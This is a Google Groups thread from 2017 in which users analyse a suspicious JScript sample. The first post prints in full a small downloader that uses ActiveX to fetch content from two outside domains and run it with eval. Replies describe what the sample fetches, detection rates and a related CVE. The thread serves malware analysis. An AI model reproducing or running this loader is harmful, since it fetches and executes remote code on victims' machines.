You do not have permission to delete messages in this group
Copy link
Report message
Show original message
Either email addresses are anonymous for this group or you need the view member email addresses permission to view the original message
to
Looks harmless enough:
var z1 = "Msxml2.XMLHTTP"; var m =
"rRJ-9BCo_j7r5qhkiCr8-rk5YjGOxEz6fHKRS4iRecpYZvsAZ96JLAqO4wEAjAAuimMx4pdoRfco9Eh8xivqlG-3SIRDdjM-KQ0";
var x = new Array("sobrspot.com","romiecoston.com"); var z4 = "a"; for
(var i=0; i<x.length; i++) { var e = new ActiveXObject(z1); try {
e.open("GET", "http://"+x[i]+"/counter/?"+m, false); e.send(); if
(e.status == 200) { var z3 = e.responseText; var z3 = z3.split(m); var
z3 = z3.join(z4); eval(z3); break; }; } catch(e) { }; };
What's it do?
Ant
unread,
Feb 12, 2017, 6:53:54 AM2/12/17
Delete
You do not have permission to delete messages in this group
Copy link
Report message
Show original message
Either email addresses are anonymous for this group or you need the view member email addresses permission to view the original message
to
"Virus Guy" wrote:
> What's it do?
Runs scripts at sobrspot.com and romiecoston.com which try to download
and run two executables from one of these domains:
You do not have permission to delete messages in this group
Copy link
Report message
Show original message
Either email addresses are anonymous for this group or you need the view member email addresses permission to view the original message
to
In other words:
http://[domain]/counter/?1 (or /?2)
Turns out that this also works:
http://[domain]/counter/?3
Gives you a 44 kb file. And it doesn't matter which domain you try -
you'll always get the same 303 or 357 or 44 kb file. /?4 doesn't give
you anything.
And this was also the first time it was seen. Detection rate 9/57.
The detections of this file don't seem to give it a name - the
detections just seem to generic "this looks suspicious so I'll flag
it". Unless GenKryptik and WisdomEyes are actual malware names.
Ant
unread,
Feb 12, 2017, 2:42:48 PM2/12/17
Delete
You do not have permission to delete messages in this group
Copy link
Report message
Show original message
Either email addresses are anonymous for this group or you need the view member email addresses permission to view the original message
to
"Virus Guy" wrote:
> Turns out that this also works:
> http://[domain]/counter/?3
> Gives you a 44 kb file.
[...]
> This is surprising:
> First submission 2010-07-03 09:04:07 UTC ( 6 years, 7 months ago )
Indications are that this is not malware and does what it says on the
tin: "PHP Script Interpreter" and "Copyright (c) 1997-2008 The PHP
Group". It imports functions from php4ts.dll, a PHP library not found
by default on Windows machines. There are no strange or obuscated
sections. It's a command-line program and even has usage help.
FromTheRafters
unread,
Feb 13, 2017, 11:30:56 AM2/13/17
Delete
You do not have permission to delete messages in this group
Copy link
Report message
Show original message
Either email addresses are anonymous for this group or you need the view member email addresses permission to view the original message
You do not have permission to delete messages in this group
Copy link
Report message
Show original message
Either email addresses are anonymous for this group or you need the view member email addresses permission to view the original message
to
I got two *.png files.
Wondering what NEW vulnerability they'd use to execute. Did
nothing in my Firefox 17 .............
[]'s
--
Don't be evil - Google 2004
We have a new policy - Google 2012
FromTheRafters
unread,
Feb 15, 2017, 1:44:37 PM2/15/17
Delete
You do not have permission to delete messages in this group
Copy link
Report message
Show original message
Either email addresses are anonymous for this group or you need the view member email addresses permission to view the original message
to
Shadow presented the following explanation :
One of the AV detections used a CVE designation and I followed that
lead. Today I can't remember the vulnerabiity but IIRC it was from
2012.
David B.
unread,
Feb 15, 2017, 6:13:34 PM2/15/17
Delete
You do not have permission to delete messages in this group
Copy link
Report message
Show original message
Either email addresses are anonymous for this group or you need the view member email addresses permission to view the original message
to
Have you been poorly, FTR?
--
"Do something wonderful, people may imitate it." (Albert Schweitzer)